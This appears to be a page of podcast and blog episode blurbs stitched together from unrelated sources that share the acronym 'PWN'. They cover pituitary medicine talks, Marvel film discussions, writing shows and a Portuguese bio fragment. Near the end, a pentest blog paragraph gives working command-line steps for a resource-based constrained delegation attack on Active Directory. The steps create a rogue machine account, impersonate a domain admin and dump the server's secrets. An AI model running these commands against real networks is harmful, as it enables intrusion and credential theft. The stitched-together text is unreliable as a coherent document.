voluntária apaixonada por temas de inclusão social, pertencendo atualmente ao advisory board da AIESEC, ao programa de Mentoria da PWN e da APAC.Top 10 da Fernanda: 1.Realização | 2.Positivo| 3.Estudioso| 4.Ativação | 5.Excelência | 6.Input | 7.Organização | 8.Conexão | 9.Relacionamento | 10.Individualização
By the time you hear this, I'll be winging my way down to sunny SO Cal, living behind the frozen environs of the PWN. Joining me today are some of my good friends;; Jason, BJ, Karl, and Woody! That's right, Woody's going us for a bit today as we talk about barbarians, Bram Stoker's Dracula, taking too long o your turn, secret confessions, and how to pronounce the name, Majere. This is a fun one, folks!
Today we present an excellent discussion with Dr. Alan Krasner, Chief Medical Officer for Crinetics Pharmaceuticals. Dr. Krasner speaks to PWN about two very important drugs currently under development. Learn about what is coming, the timelines, potential new therapies, and approaches in acromegaly, Cushing's, and hyperinsulinism. These are exciting times in the field with a forward-thinking, creative group of scientists applying their knowledge and experience in pituitary and neuroendocrine science to develop new approaches and solutions for patients. This is a discussion you don't want to miss! Click on this link to learn more about Crinetics' clinical studies and how to participate.
The ongoing debates and nomenclature change and reclassification are apparently over, and adenomas and now referred to as Pit-Net's (pituitary neuroendocrine tumors). Is this good, bad, or indifferent? These are complicated matters, so to shed some more light on the subject, we've invited some experts to discuss them. In today's live talk, I'm joined by co-host and PWN cofounder Dr. Lewis Blevins; as you all know, Dr. Blevins is the Medical Director of the California Center for Pituitary disorders at UCSF. Also with us is Dr. Manish Aghi. Dr. Aghi is a frequent contributor to PWN and an attending Neurosurgeon California Center for Pituitary Disorders. Professor of Neurological Surgery and Principal Investigator, UCSF Brain Tumor Research Center'' We are also delighted to welcome Dr. Arie Perry. Dr. Perry is the director of neuropathology at UCSF; he specializes in diagnosing benign and cancerous nervous system tumors, including those of the brain, spinal cord, and peripheral nerves. He is also a specialist in classifying the molecular genetics of tumors, which can be used to help determine the best treatment. To learn more, this PWN article provides additional background and reading on the subject.
Today we speak to Adam Vitcavage, founder of Debutiful, a literary webpage and podcast. Much like PWN's Debut Review, Debutiful focuses on connecting readers and listeners with debut authors. Adam is also the Director of Events at Tattered Cover Bookstore in Denver, Colorado.In Episode Four of Season Four, we talk to Adam about how to start a podcast, how to interview famous people, how to understand our mothers, and how to read really great books. Adam also offers a list of his current must reads.
If you didn't have a chance to hear it live, here's a podcast from the live talk session from last Thursday with special guest, PWN friend, and contributor pituitary neurosurgeon Dr. Sandeep Kunwar. He joined Dr. Lewis Blevins for a great discussion of the latest in pituitary surgery and disease management. These are two of the most experienced pituitary physicians in the world, providing a personal, intimate look at their craft. Don't miss this podcast with tons of information and insight from two leading world-class professionals. Enjoy! Learn more about Dr. Kunwar in this video from the California Center for Pituitary disorders at UCSF and listen to this podcast we did with him a few years ago. Don't miss "Live Talk" Thursday, September 22, 3:00 pm PST.
In this podcast, Dr. Lewis Blevins discusses traumatic brain injury (TBI) and hypopituitarism with Dr. Tamara Wexler, a nationally recognized neuroendocrinologist and expert in pituitary dysfunction after a brain injury. They focus on the many aspects of assessing pituitary function in people with traumatic brain injuries. Dr. Wexler's research efforts focus on pituitary dysfunction after brain injury. Don't miss this fascinating discussion. Click here for more PWN articles on TBI.
Paul, Wes, and Josh sit down to discuss the Marvel Cinematic Universe and it's trajectory by taking a look at each of the films and giving their opinions on the good, the bad, and the ugly on another PWN cast! This is the third portion of the episode, covering all of the movies in Phase 3 of the MCU. It ends abruptly due to technical issues, but most of our thoughts are still communicated. Be sure and follow The TechnoFunkBoy over on his website and Wes's podcast, The Henshin Dad, for more PWN goodness. Have any thoughts on the MCU? Come join us over on Discord! Our Facebook group is The Backlog Book Club and Here is our Twitter. You can also email us at thebacklogbreakdown@gmail.com. And if you'd like to support us, you can visit our Patreon. The Backlog Breakdown is a proud member of the Play Well Network, a network of podcasts that seek to approach recreation in a more thoughtful manner. Until there is a rabbit trail to follow. Check out all of the other amazing Play Well podcasts Here. Get PWNed, scrubs. Part of the Opening theme is: "The Savior of Dream Land" ReMix by Juan Medrano, hosted by OCRemix.
Paul, Wes, and Josh sit down to discuss the Marvel Cinematic Universe and it's trajectory by taking a look at each of the films and giving their opinions on the good, the bad, and the ugly on another PWN cast! This is the second portion of the episode, covering all of the movies in Phase 2 of the MCU. Be sure and follow The TechnoFunkBoy over on his website and Wes's podcast, The Henshin Dad, for more PWN goodness. Come join us over on Discord! Our Facebook group is The Backlog Book Club and Here is our Twitter. You can also email us at thebacklogbreakdown@gmail.com. And if you'd like to support us, you can visit our Patreon. The Backlog Breakdown is a proud member of the Play Well Network, a network of podcasts that seek to approach recreation in a more thoughtful manner. Until there is a rabbit trail to follow. Check out all of the other amazing Play Well podcasts Here. Get PWNed, scrubs. Part of the Opening theme is: "The Savior of Dream Land" ReMix by Juan Medrano, hosted by OCRemix.
It's a PWN Cast...without Nate or Josh. But Paul and Wes are here to talk about what they've been playing, Star Trek, The Orville, D&D, Marvel, and pretty much anything else that comes to mind. Be sure and follow The TechnoFunkBoy over on his website and Wes's podcast, The Henshin Dad, for more PWN goodness. Come join us over on Discord! Our Facebook group is The Backlog Book Club and Here is our Twitter. You can also email us at thebacklogbreakdown@gmail.com. And if you'd like to support us, you can visit our Patreon. The Backlog Breakdown is a proud member of the Play Well Network, a network of podcasts that seek to approach recreation in a more thoughtful manner. Until there is a rabbit trail to follow. Check out all of the other amazing Play Well podcasts Here. Get PWNed, scrubs. Part of the Opening theme is: "The Savior of Dream Land" ReMix by Juan Medrano, hosted by OCRemix.
Paul, Wes, and Josh sit down to discuss the Marvel Cinematic Universe and it's trajectory by taking a look at each of the films and giving their opinions on the good, the bad, and the ugly on another PWN cast! This is the first portion of the episode, covering all of the movies in Phase 1 of the MCU. Be sure and follow The TechnoFunkBoy over on his website and Wes's podcast, The Henshin Dad, for more PWN goodness. Come join us over on Discord! Our Facebook group is The Backlog Book Club and Here is our Twitter. You can also email us at thebacklogbreakdown@gmail.com. And if you'd like to support us, you can visit our Patreon. The Backlog Breakdown is a proud member of the Play Well Network, a network of podcasts that seek to approach recreation in a more thoughtful manner. Until there is a rabbit trail to follow. Check out all of the other amazing Play Well podcasts Here. Get PWNed, scrubs. Part of the Opening theme is: "The Savior of Dream Land" ReMix by Juan Medrano, hosted by OCRemix.
Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domainsome.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!
Today's guest, Lizzie Finn, is a screenwriter, instructor, and the director of Project Write Now's Screen Academy. Her screenplay, Relative Distance, co-written with Sandra Longo, has won numerous accolades, including Best Feature Script in both the Paris Film Awards and the London Movie Awards.Lizzie speaks to us about how to write a screenplay, how to find a creative partner, and how to get involved in PWN's Screen Academy. We also do an in-house table read of a scene from Lizzie's award-winning screenplay.